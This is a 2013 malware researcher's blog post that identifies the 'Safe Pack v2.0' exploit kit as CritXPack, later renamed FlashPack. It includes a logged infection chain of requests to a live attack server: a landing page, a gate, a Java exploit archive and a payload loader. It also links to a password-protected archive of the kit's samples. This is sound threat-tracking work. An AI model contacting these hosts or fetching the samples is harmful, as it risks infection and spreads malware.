2013-04-21 - Connect the dots

Meet Safe Pack (v2.0)... Again :)


A "new" pack is advertised on underground. Thanks Kahu Security for locating and providing initial image of the advert.

In fact I faced it before seeing the advert, and reading it really puzzled me.
Initial advert for SafePack as spotted by @KahuSecurity
What i faced was not matching this at all.
No CVE-2011-3402 (Duqu like fontdrop), no CVE-2013-0634 (LadyBoyle), no CVE-2013-1493
So I was kind of lost...This advert could be for Popads or Old version of Cool EK but not for what i saw.

But...going back checking if I could find more information :

Updated Advert - more realistic :)
Ok. Sound better !
Here is btw the image that we are supposed to see in the advert :
Screenshot Provided in the advert
And now here is what i faced :

CritXPack for sure !
hum...
As CritXPack was kind of calm past days...i checked :
Safe Pack v2.0 Login Screen

I see two explanation :
1- CritXPack (Formerly Vintage Pack) is now called Safe Pack v2.0
2- Safe Pack v2.0 is a rip of CritXPack...
Don't know for sure...based on initial advert + ProHack's other posts I bet for option 2.
Anyway won't make a full review of this pack.

As i was not aware of CVE-2013-1493 in CritXPack I tried that against Safe Pack v2.0
And yes...you are safe with java 7u15 and 6u41.
Chances are low to see major updates on this pack.

<edit1 2013-04-26>
Safe Pack v2 - Private version of CritXPack now gone into commercial sales (?)
</edit1>
<edit2 2013-06-06>
Seems like it has been renamed FlashPack.
Safe Pack Renamed : FlashPack
Not a fork. It's the same thing.
Little modification in the pattern :
FlashPack aka SafePack aka CritXPack

GET http://62.76.188 .7/c1905hfosv/bods2903bue/index.php?id=5520563456
200 OK (text/html)

GET http://62.76.188 .7/c1905hfosv/bods2903bue/js/js.js
200 OK (application/x-javascript)

GET http://62.76.188 .7/c1905hfosv/bods2903bue/gate.php?ver=Eg1l8cwwgE:E:E:w:EglPPCwwgC:88pP8cg18c&p=9.3.0.0&j=1.7.0.7&f=11.7.700.202
200 OK (text/html)

GET http://62.76.188 .7/c1905hfosv/bods2903bue/js/deployJava.js
200 OK (application/x-javascript)

GET http://62.76.188 .7/c1905hfosv/bods2903bue/j07.php?i=EglPPCww1p
200 OK (application/java-archive)

GET http://62.76.188 .7/c1905hfosv/bods2903bue/load.php?e=g&ip=Eg1l8cwwgE
200 OK (application/octet-stream)

GET http://62.76.188 .7/c1905hfosv/bods2903bue/index.php?id=5520563456
302 Found to http://www.adobe.com
</edit2>

Files:
SafePack_2pass_2013-04-20.zip (OwnCloud via Goo.gl)

Read More:



EXPLOIT-KIT
FlashPack update CritXPack Exploit Kit Safe Pack VintagePack